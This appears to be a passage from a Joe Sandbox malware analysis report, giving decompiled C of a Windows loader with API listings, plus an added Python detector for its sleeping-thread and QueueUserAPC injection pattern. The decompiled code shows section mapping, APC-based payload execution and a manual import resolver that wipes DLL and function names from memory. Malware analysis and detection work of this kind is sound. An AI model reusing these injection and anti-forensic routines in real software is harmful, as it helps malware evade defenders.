Uniqueness
Uniqueness Score: 8.94%

Control-flow Graph

                                                                                                                                        control_flow_graph 219 401af0-401b22 NtMapViewOfSection 220 401b24-401b26 219->220 221 401b28 219->221 222 401b2c-401b2f 220->222 221->222
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                         			E00401AF0(void** __esi, PVOID* _a4) {
                                                                                                                                         				long _v8;
                                                                                                                                         				void* _v12;
                                                                                                                                         				void* _v16;
                                                                                                                                         				long _t13;

                                                                                                                                         				// __esi points at a small context block: [0] section handle, [2] page protection, [6] function pointer
                                                                                                                                         				_v16 = 0;
                                                                                                                                         				asm("stosd");
                                                                                                                                         				_v8 = 0;
                                                                                                                                         				// Map the section into the current process (ProcessHandle -1): SectionOffset 0, ViewSize 0 (whole section),
                                                                                                                                         				// InheritDisposition 2 (ViewUnmap), protection __esi[2]; the view base is returned through _a4
                                                                                                                                         				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                         				if(_t13 < 0) {
                                                                                                                                         					// NTSTATUS failure: pass the status to the routine stored at __esi[6] and return its result
                                                                                                                                         					_push(_t13);
                                                                                                                                         					return __esi[6]();
                                                                                                                                         				}
                                                                                                                                         				return 0;
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                        • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401972,00000002,00000000,?,?,00000000,?,?,00401972,00000000), ref: 00401B1D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323581903-0
                                                                                                                                        • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                        • Instruction ID: 155a4350041d930c457d0e5cb3bff2c8d54c3b955150682a38563a2be07dce39
                                                                                                                                        • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                        • Instruction Fuzzy Hash: 25F012B590020CBFDB119FA5CC85CAFBBBDEB44354B10493AF552E10A0D630AE089A60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                         			E004010F9(void* __ecx) {
                                                                                                                                         				void* _v32;
                                                                                                                                         				long _v36;
                                                                                                                                         				long _v40;
                                                                                                                                         				long _v44;
                                                                                                                                         				long _t13;
                                                                                                                                         				long _t14;
                                                                                                                                         				void* _t17;
                                                                                                                                         				long _t20;
                                                                                                                                         				long _t21;
                                                                                                                                         				void* _t28;
                                                                                                                                         				intOrPtr _t30;
                                                                                                                                         				long _t35;
                                                                                                                                         				intOrPtr _t36;
                                                                                                                                         				void* _t37;
                                                                                                                                         				void* _t42;
                                                                                                                                         				void* _t46;
                                                                                                                                         				intOrPtr* _t47;
                                                                                                                                         				intOrPtr _t7;

                                                                                                                                         				_t37 = __ecx;
                                                                                                                                         				// Initialisation (subcall APIs below: CreateEventA, GetVersion, GetCurrentProcessId,
                                                                                                                                         				// OpenProcess on its own PID); a non-zero result is returned as an error
                                                                                                                                         				_t13 = E00401498();
                                                                                                                                         				_v36 = _t13;
                                                                                                                                         				if(_t13 != 0) {
                                                                                                                                         					L19:
                                                                                                                                         					return _t13;
                                                                                                                                         				}
                                                                                                                                         				_t13 = E00401EFB(__ecx); // executed
                                                                                                                                         				_v36 = _t13;
                                                                                                                                         				if(_t13 != 0) {
                                                                                                                                         					goto L19;
                                                                                                                                         				}
                                                                                                                                         				// Case-insensitive substring check (StrStrIA in the subcall APIs); non-zero aborts
                                                                                                                                         				// before any payload thread is created
                                                                                                                                         				_t14 = E0040212A(__ecx); // executed
                                                                                                                                         				_v36 = _t14;
                                                                                                                                         				if(_t14 != 0) {
                                                                                                                                         					L17:
                                                                                                                                         					_t13 = _v36;
                                                                                                                                         					if(_t13 == 0xffffffff) {
                                                                                                                                         						_t13 = GetLastError();
                                                                                                                                         					}
                                                                                                                                         					goto L19;
                                                                                                                                         				}
                                                                                                                                         				// E00401077 fills _v32 with the module's own path (GetModuleFileNameW)
                                                                                                                                         				if(E00401077(_t37,  &_v32) != 0) {
                                                                                                                                         					 *0x4040f8 = 0;
                                                                                                                                         					L9:
                                                                                                                                         					// The thread's start routine is SleepEx itself and its single parameter, *0x404100,
                                                                                                                                         					// becomes dwMilliseconds: the thread exists only to host the APC queued below
                                                                                                                                         					_t17 = CreateThread(0, 0, __imp__SleepEx,  *0x404100, 0, 0); // executed
                                                                                                                                         					_t46 = _t17;
                                                                                                                                         					if(_t46 == 0) {
                                                                                                                                         						L16:
                                                                                                                                         						_v40 = GetLastError();
                                                                                                                                         						goto L17;
                                                                                                                                         					}
                                                                                                                                         					// The real work is E00401D33, delivered as a user APC that runs once the sleeping
                                                                                                                                         					// thread is in an alertable wait; &_v32 (the module path) is its argument
                                                                                                                                         					_t20 = QueueUserAPC(E00401D33, _t46,  &_v32); // executed
                                                                                                                                         					if(_t20 == 0) {
                                                                                                                                         						// Could not queue the APC: kill the idle thread and preserve the error code
                                                                                                                                         						_t35 = GetLastError();
                                                                                                                                         						TerminateThread(_t46, _t35);
                                                                                                                                         						CloseHandle(_t46);
                                                                                                                                         						_t46 = 0;
                                                                                                                                         						SetLastError(_t35);
                                                                                                                                         					}
                                                                                                                                         					if(_t46 == 0) {
                                                                                                                                         						goto L16;
                                                                                                                                         					} else {
                                                                                                                                         						// Block until the APC thread finishes and collect its exit code into _v44
                                                                                                                                         						_t21 = WaitForSingleObject(_t46, 0xffffffff);
                                                                                                                                         						_v44 = _t21;
                                                                                                                                         						if(_t21 == 0) {
                                                                                                                                         							GetExitCodeThread(_t46,  &_v44);
                                                                                                                                         						}
                                                                                                                                         						CloseHandle(_t46);
                                                                                                                                         						goto L17;
                                                                                                                                         					}
                                                                                                                                         				}
                                                                                                                                         				// Normalise the module path with GetLongPathNameW: the first call sizes the buffer,
                                                                                                                                         				// E00401A95 allocates it, the second call fills it, and E00401F77 (HeapFree) releases
                                                                                                                                         				// the original; the path kept at 0x4040f8 is what the APC routine receives
                                                                                                                                         				_t36 = _v32;
                                                                                                                                         				_t47 = __imp__GetLongPathNameW;
                                                                                                                                         				_t28 =  *_t47(_t36, 0, 0); // executed
                                                                                                                                         				_t42 = _t28;
                                                                                                                                         				if(_t42 == 0) {
                                                                                                                                         					L7:
                                                                                                                                         					 *0x4040f8 = _t36;
                                                                                                                                         					goto L9;
                                                                                                                                         				}
                                                                                                                                         				_t7 = _t42 + 2; // 0x2
                                                                                                                                         				_t30 = E00401A95(_t42 + _t7);
                                                                                                                                         				 *0x4040f8 = _t30;
                                                                                                                                         				if(_t30 == 0) {
                                                                                                                                         					goto L7;
                                                                                                                                         				}
                                                                                                                                         				 *_t47(_t36, _t30, _t42); // executed
                                                                                                                                         				E00401F77(_t36);
                                                                                                                                         				goto L9;
                                                                                                                                         			}
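The sequence in E004010F9 (a thread created on SleepEx, then QueueUserAPC pointing back into the unpacked image, then a wait on that thread) is a useful thing to flag automatically when triaging many of these reports. The following is an added example, not code from the report or from the sample: it parses entries in the format the "APIs" listing uses ("Name.MODULE(arg,...), ref: ADDR"), skips "Part of subcall function" entries, and reports a CreateThread followed by a QueueUserAPC whose callback address (first argument) falls inside the dumped image. The sample lines are copied from the listing below this function; the image bounds are taken from the memory-dump sources (0x400000 base), with the upper bound an assumption.

```python
"""Flag the sleeping-thread + QueueUserAPC pattern in a Joe Sandbox 'APIs' listing.

Added example, not part of the report or of the analysed sample. Lines are expected in
the report's own format, e.g.
    • QueueUserAPC.KERNELBASE(00401D33,00000000,?,?,00000000), ref: 004011B4
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Image bounds: base from the memory-dump sources in the report; the end is an assumption.
IMAGE_LO = 0x400000
IMAGE_HI = 0x408000

API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the sandbox logged '?'
    ref: int                   # call-site address
    direct: bool               # False for "Part of subcall function" entries


def parse_api_lines(lines):
    """Parse report API lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in lines:
        m = API_LINE.search(line)
        if not m:
            continue
        args = []
        for a in m.group("args").split(","):
            a = a.strip()
            if not a:
                continue
            args.append(None if a == "?" else int(a, 16))
        calls.append(ApiCall(
            m.group("name"), m.group("module"), args, int(m.group("ref"), 16),
            "Part of subcall function" not in line,
        ))
    return calls


def find_apc_self_injection(calls, image_lo, image_hi):
    """Return call sites of a CreateThread followed (in listing order) by a QueueUserAPC
    whose pfnAPC lies inside [image_lo, image_hi), or None if the pattern is absent.
    Only the function's direct calls are considered, not subcall entries."""
    create = None
    for c in calls:
        if not c.direct:
            continue
        if c.name == "CreateThread":
            create = c
        elif c.name == "QueueUserAPC" and create is not None:
            target = c.args[0] if c.args else None
            if target is not None and image_lo <= target < image_hi:
                return {
                    "create_thread_ref": create.ref,
                    "queue_apc_ref": c.ref,
                    "apc_target": target,
                }
    return None


# Sample input copied from the report's APIs listing for E004010F9 (constructed subset).
SAMPLE_API_LINES = [
    "• Part of subcall function 00401498: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040110A,?,00000000), ref: 004014A7",
    "• GetLastError.KERNEL32(?,00000000), ref: 00401219",
    "• GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401155",
    "• CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 0040119D",
    "• QueueUserAPC.KERNELBASE(00401D33,00000000,?,?,00000000), ref: 004011B4",
    "• TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004011CE",
]


if __name__ == "__main__":
    hit = find_apc_self_injection(parse_api_lines(SAMPLE_API_LINES), IMAGE_LO, IMAGE_HI)
    if hit:
        print("APC self-injection: CreateThread @%08x, QueueUserAPC @%08x -> %08x"
              % (hit["create_thread_ref"], hit["queue_apc_ref"], hit["apc_target"]))
    else:
        print("pattern not found")
```

The start address logged for CreateThread is 00000000 in this report, so the check keys on the APC target rather than on the thread routine; an APC callback inside a region that was unpacked at runtime is the stronger signal anyway.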

APIs
  • Part of subcall function 00401498: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040110A,?,00000000), ref: 004014A7
  • Part of subcall function 00401498: GetVersion.KERNEL32(?,00000000), ref: 004014B6
  • Part of subcall function 00401498: GetCurrentProcessId.KERNEL32(?,00000000), ref: 004014C5
  • Part of subcall function 00401498: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 004014DE
  • Part of subcall function 0040212A: StrStrIA.KERNELBASE(00000000,00000000,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 00402181
  • Part of subcall function 0040212A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 0040219B
• GetLastError.KERNEL32(?,00000000), ref: 00401219
  • Part of subcall function 00401077: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,00000000,?,?,?,00401144,?,?,00000000), ref: 004010A0
• GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401155
• GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401173
  • Part of subcall function 00401F77: HeapFree.KERNEL32(00000000,?,00401A16,?,00000000,?,?,00402203,00000000,?,?,00401F0D,?,00000000), ref: 00401F83
• CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 0040119D
• QueueUserAPC.KERNELBASE(00401D33,00000000,?,?,00000000), ref: 004011B4
• GetLastError.KERNEL32(?,00000000), ref: 004011C4
• TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004011CE
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 004011D5
• SetLastError.KERNEL32(00000000,?,00000000), ref: 004011DA
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004011E7
• GetExitCodeThread.KERNEL32(00000000,?,?,00000000), ref: 004011FB
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401202
• GetLastError.KERNEL32(?,00000000), ref: 00401206
  • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
Memory Dump Source
• Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
Similarity
• API ID: ErrorLast$HeapNameThread$CloseCreateFreeHandleLongPathProcess$AllocCodeCurrentEventExitFileModuleObjectOpenQueueSingleTerminateUserVersionWait
• String ID:
• API String ID: 2300755891-0
• Opcode ID: 62e79a8864fe4bc6f26208144dfe6b28918a0bb245ec89afcfe40c88ff1a4dc3
• Instruction ID: bb683312699e85ed37c1b69070dc8026002bfd6335ed63ea75abe30ddc4dff10
• Opcode Fuzzy Hash: 62e79a8864fe4bc6f26208144dfe6b28918a0bb245ec89afcfe40c88ff1a4dc3
• Instruction Fuzzy Hash: B631A371401611ABC721EFB59D48C6B7EACEE89751711063FFA25F22A0E738C90587BE
Uniqueness
Uniqueness Score: 8.94%

Control-flow Graph (basic blocks 40200d-402127, nodes marked Executed / Not Executed; graph rendering not reproduced here)
C-Code - Quality: 100%

// Import resolver for a manually mapped PE image (the injected payload):
// __ebx is the image base, _a4 points at its IMAGE_NT_HEADERS. The loop walks
// the IMAGE_IMPORT_DESCRIPTOR table, loads each DLL, resolves every name or
// ordinal into the IAT, and then overwrites the DLL and function name strings
// with zeros so they do not survive in a memory dump. Returns 0 on success,
// 0x7e (ERROR_MOD_NOT_FOUND) if LoadLibraryA fails and 0x7f
// (ERROR_PROC_NOT_FOUND) if GetProcAddress fails.
E0040200D(void* __ebx, intOrPtr _a4) {
	intOrPtr* _v8;
	signed int _v12;
	signed short _v16;
	struct HINSTANCE__* _v20;
	intOrPtr _v24;
	_Unknown_base(*)()* _v28;
	intOrPtr _t33;
	intOrPtr _t35;
	struct HINSTANCE__* _t36;
	intOrPtr _t39;
	CHAR* _t43;
	_Unknown_base(*)()* _t44;
	void* _t51;
	intOrPtr _t52;
	signed short _t53;
	intOrPtr* _t56;
	signed short _t58;
	CHAR* _t59;
	CHAR* _t61;
	signed short* _t63;
	void* _t64;
	signed short _t71;

	_t51 = __ebx;                               // image base
	_t33 =  *((intOrPtr*)(_a4 + 0x80));          // DataDirectory[IMPORT].VirtualAddress
	_v12 = _v12 & 0x00000000;                   // result code, 0 = success
	if(_t33 == 0) {
		L28:
		return _v12;
	}
	_t56 = _t33 + __ebx;                        // first IMAGE_IMPORT_DESCRIPTOR
	_t35 =  *((intOrPtr*)(_t56 + 0xc));          // descriptor->Name (RVA of the DLL name)
	_v8 = _t56;
	if(_t35 == 0) {
		L27:
		goto L28;
	}
	while(1) {
		_t61 = _t35 + _t51;                     // DLL name string
		_t36 = LoadLibraryA(_t61); // executed
		_v20 = _t36;
		if(_t36 == 0) {
			break;
		}
		_v16 = _v16 & 0x00000000;
		memset(_t61, 0, lstrlenA(_t61));        // wipe the DLL name after use
		_t52 =  *_t56;                           // descriptor->OriginalFirstThunk
		_t39 =  *((intOrPtr*)(_t56 + 0x10));     // descriptor->FirstThunk (IAT)
		_t64 = _t64 + 0xc;                      // cdecl stack clean-up for memset/lstrlenA
		if(_t52 != 0) {
			L6:
			_t63 = _t52 + _t51;                 // current thunk entry
			_t53 =  *_t63;
			if(_t53 == 0) {
				L23:
				_t35 =  *((intOrPtr*)(_t56 + 0x20)); // next descriptor's Name
				_t56 = _t56 + 0x14;             // sizeof(IMAGE_IMPORT_DESCRIPTOR)
				_v8 = _t56;
				if(_t35 != 0) {
					continue;
				}
				L26:
				goto L27;
			}
			_v24 = _t39 - _t63 + _t51;          // delta from this thunk entry to its IAT slot
			_t71 = _t53;
			L8:
			if(_t71 < 0) {                      // IMAGE_ORDINAL_FLAG set: import by ordinal
				if(_t53 < _t51 || _t53 >=  *((intOrPtr*)(_a4 + 0x50)) + _t51) { // outside SizeOfImage
					_t58 = 0;
					_v16 =  *_t63 & 0x0000ffff; // ordinal number
				} else {
					_t58 = _t53;                // value already points inside the image
				}
			} else {
				_t58 = _t53 + _t51;             // IMAGE_IMPORT_BY_NAME
			}
			_t19 = _t58 + 2; // 0x2
			_t43 = _t19;                        // skip the Hint field to reach Name
			if(_t58 == 0) {
				_t43 = _v16 & 0x0000ffff;       // pass the ordinal instead of a name
			}
			_t44 = GetProcAddress(_v20, _t43);
			_v28 = _t44;
			if(_t44 == 0) {
				goto L21;
			}
			if(_t58 != 0) {
				_t59 = _t58 + 2;
				memset(_t59, 0, lstrlenA(_t59)); // wipe the function name after use
				_t64 = _t64 + 0xc;
			}
			 *(_v24 + _t63) = _v28;              // write resolved address into the IAT
			_t63 =  &(_t63[2]);                  // next thunk entry
			_t53 =  *_t63;
			if(_t53 != 0) {
				goto L8;
			} else {
				L22:
				_t56 = _v8;
				goto L23;
			}
			L21:
			_v12 = 0x7f;                        // ERROR_PROC_NOT_FOUND
			goto L22;
		}
		_t52 = _t39;                            // no OriginalFirstThunk: walk the IAT itself
		if(_t39 == 0) {
			goto L23;
		}
		goto L6;
	}
	_v12 = 0x7e;                                // ERROR_MOD_NOT_FOUND
	goto L26;
}
                                                                                                                                        0x004020b5
                                                                                                                                        0x004020b5
                                                                                                                                        0x004020b8
                                                                                                                                        0x004020ba
                                                                                                                                        0x004020ba
                                                                                                                                        0x004020c2
                                                                                                                                        0x004020ca
                                                                                                                                        0x004020cd
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x004020d1
                                                                                                                                        0x004020d3
                                                                                                                                        0x004020e1
                                                                                                                                        0x004020e6
                                                                                                                                        0x004020e6
                                                                                                                                        0x004020ef
                                                                                                                                        0x004020f2
                                                                                                                                        0x004020f5
                                                                                                                                        0x004020f9
                                                                                                                                        0x00000000
                                                                                                                                        0x004020fb
                                                                                                                                        0x00402104
                                                                                                                                        0x00402104
                                                                                                                                        0x00000000
                                                                                                                                        0x00402104
                                                                                                                                        0x004020fd
                                                                                                                                        0x004020fd
                                                                                                                                        0x00000000
                                                                                                                                        0x004020fd
                                                                                                                                        0x00402072
                                                                                                                                        0x00402074
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00402074
                                                                                                                                        0x0040211a
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00000002), ref: 0040203F
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00402055
                                                                                                                                        • memset.NTDLL ref: 0040205F
                                                                                                                                        • GetProcAddress.KERNEL32(?,00000002), ref: 004020C2
                                                                                                                                        • lstrlenA.KERNEL32(-00000002), ref: 004020D7
                                                                                                                                        • memset.NTDLL ref: 004020E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                        • String ID: ~
                                                                                                                                        • API String ID: 1986585659-1707062198
                                                                                                                                        • Opcode ID: cb2e01a94367c0997ebb489a93677b537e155a27476c5409b52cb2374fde3804
                                                                                                                                        • Instruction ID: c2249b9ba54ce8cd13e3d626b5bb9c5edf2d9ac075444a506c99b0b9014fddb2
                                                                                                                                        • Opcode Fuzzy Hash: cb2e01a94367c0997ebb489a93677b537e155a27476c5409b52cb2374fde3804
                                                                                                                                        • Instruction Fuzzy Hash: 8B313D71A01215ABDB14CF55CA88B6EB7B4AF44304F10407AEA05FB2D0D7B8AA45CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.36%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E004013AB(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				struct HINSTANCE__* _t25;
                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                        				_Unknown_base(*)()* _t35;
                                                                                                                                        				_Unknown_base(*)()* _t38;
                                                                                                                                        				_Unknown_base(*)()* _t41;
                                                                                                                                        				intOrPtr _t44;
                                                                                                                                        				struct HINSTANCE__* _t48;
                                                                                                                                        				intOrPtr _t54;
                                                                                                                                        
                                                                                                                                        				_t54 = E00401A95("true");
                                                                                                                                        				if(_t54 == 0) {
                                                                                                                                        					_v8 = 8;
                                                                                                                                        				} else {
                                                                                                                                        					_t25 = GetModuleHandleA( *0x404104 + 0x405014); // executed
                                                                                                                                        					_t48 = _t25;
                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                        					_t28 = GetProcAddress(_t48,  *0x404104 + 0x4050dc); // executed
                                                                                                                                        					 *(_t54 + 0xc) = _t28;
                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                        						L8:
                                                                                                                                        						E00401F77(_t54);
                                                                                                                                        					} else {
                                                                                                                                        						_t32 = GetProcAddress(_t48,  *0x404104 + 0x4050ec); // executed
                                                                                                                                        						 *(_t54 + 0x10) = _t32;
                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                        							goto L8;
                                                                                                                                        						} else {
                                                                                                                                        							_t35 = GetProcAddress(_t48,  *0x404104 + 0x4050ff); // executed
                                                                                                                                        							 *(_t54 + 0x14) = _t35;
                                                                                                                                        							if(_t35 == 0) {
                                                                                                                                        								goto L8;
                                                                                                                                        							} else {
                                                                                                                                        								_t38 = GetProcAddress(_t48,  *0x404104 + 0x405114); // executed
                                                                                                                                        								 *(_t54 + 0x18) = _t38;
                                                                                                                                        								if(_t38 == 0) {
                                                                                                                                        									goto L8;
                                                                                                                                        								} else {
                                                                                                                                        									_t41 = GetProcAddress(_t48,  *0x404104 + 0x40512a); // executed
                                                                                                                                        									 *(_t54 + 0x1c) = _t41;
                                                                                                                                        									if(_t41 == 0) {
                                                                                                                                        										goto L8;
                                                                                                                                        									} else {
                                                                                                                                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                        										_t44 = E00401900(_t54, _a8); // executed
                                                                                                                                        										_v8 = _t44;
                                                                                                                                        										if(_t44 != 0) {
                                                                                                                                        											goto L8;
                                                                                                                                        										} else {
                                                                                                                                        											 *_a12 = _t54;
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _v8;
                                                                                                                                        			}


                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
                                                                                                                                        • GetModuleHandleA.KERNELBASE(?,?,00000002,?,?,?,?,?,00401C49,?,?,?,00000002,00000000,?,?), ref: 004013D0
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 004013F2
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 00401408
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 0040141E
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 00401434
                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 0040144A
                                                                                                                                          • Part of subcall function 00401900: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74F44EE0,00000000,00000000,00000002), ref: 0040195D
                                                                                                                                          • Part of subcall function 00401900: memset.NTDLL ref: 0040197F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1632424568-0
                                                                                                                                        • Opcode ID: 99d59773909d28d0934ab75aecaf35677e36cf23fb5e0f66e731de5bb7df202d
                                                                                                                                        • Instruction ID: 767cb2767e9b0f152a1239e38c800a7140cf79fa693cec0873ac8bbff2be09e6
                                                                                                                                        • Opcode Fuzzy Hash: 99d59773909d28d0934ab75aecaf35677e36cf23fb5e0f66e731de5bb7df202d
                                                                                                                                        • Instruction Fuzzy Hash: 042139F160020A9FE710DF69C988E6B77ECEB54784700457AEA49EB271E774E9018F78
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			_entry_() {
                                                                                                                                        				void* _t1;
                                                                                                                                        				int _t4;
                                                                                                                                        				void* _t6;
                                                                                                                                        				int _t7;
                                                                                                                                        
                                                                                                                                        				_t7 = 0;
                                                                                                                                        				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                        				 *0x4040e0 = _t1;
                                                                                                                                        				if(_t1 != 0) {
                                                                                                                                        					 *0x4040f0 = GetModuleHandleA(0);
                                                                                                                                        					GetCommandLineW(); // executed
                                                                                                                                        					_t4 = E004010F9(_t6); // executed
                                                                                                                                        					_t7 = _t4;
                                                                                                                                        					HeapDestroy( *0x4040e0);
                                                                                                                                        				}
                                                                                                                                        				ExitProcess(_t7);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401AB4
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401AC4
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00401ACF
                                                                                                                                          • Part of subcall function 004010F9: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401155
                                                                                                                                          • Part of subcall function 004010F9: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401173
                                                                                                                                          • Part of subcall function 004010F9: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 0040119D
                                                                                                                                          • Part of subcall function 004010F9: QueueUserAPC.KERNELBASE(00401D33,00000000,?,?,00000000), ref: 004011B4
                                                                                                                                          • Part of subcall function 004010F9: GetLastError.KERNEL32(?,00000000), ref: 004011C4
                                                                                                                                          • Part of subcall function 004010F9: TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004011CE
                                                                                                                                          • Part of subcall function 004010F9: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004011D5
                                                                                                                                          • Part of subcall function 004010F9: SetLastError.KERNEL32(00000000,?,00000000), ref: 004011DA
                                                                                                                                          • Part of subcall function 004010F9: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004011E7
                                                                                                                                          • Part of subcall function 004010F9: GetExitCodeThread.KERNEL32(00000000,?,?,00000000), ref: 004011FB
                                                                                                                                          • Part of subcall function 004010F9: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401202
                                                                                                                                          • Part of subcall function 004010F9: GetLastError.KERNEL32(?,00000000), ref: 00401219
                                                                                                                                        • HeapDestroy.KERNEL32 ref: 00401AE2
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401AE9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorHandleLastThread$CloseCreateExitHeapLongNamePath$CodeCommandDestroyLineModuleObjectProcessQueueSingleTerminateUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 63870677-0
                                                                                                                                        • Opcode ID: 843f5726b929336745ade2e255d2a3830ea9bb8ce47e5bff0d450a26e21d1d6b
                                                                                                                                        • Instruction ID: 9318bfb8ceca5ce0d2e900e56b3735b1b872d864aba0d18e0f40cf2fe05f6ce9
                                                                                                                                        • Opcode Fuzzy Hash: 843f5726b929336745ade2e255d2a3830ea9bb8ce47e5bff0d450a26e21d1d6b
                                                                                                                                        • Instruction Fuzzy Hash: 36E0B675803260ABC7216F71BE0CB4A3E7CBF057827004136F602F2175DB7846018BAC
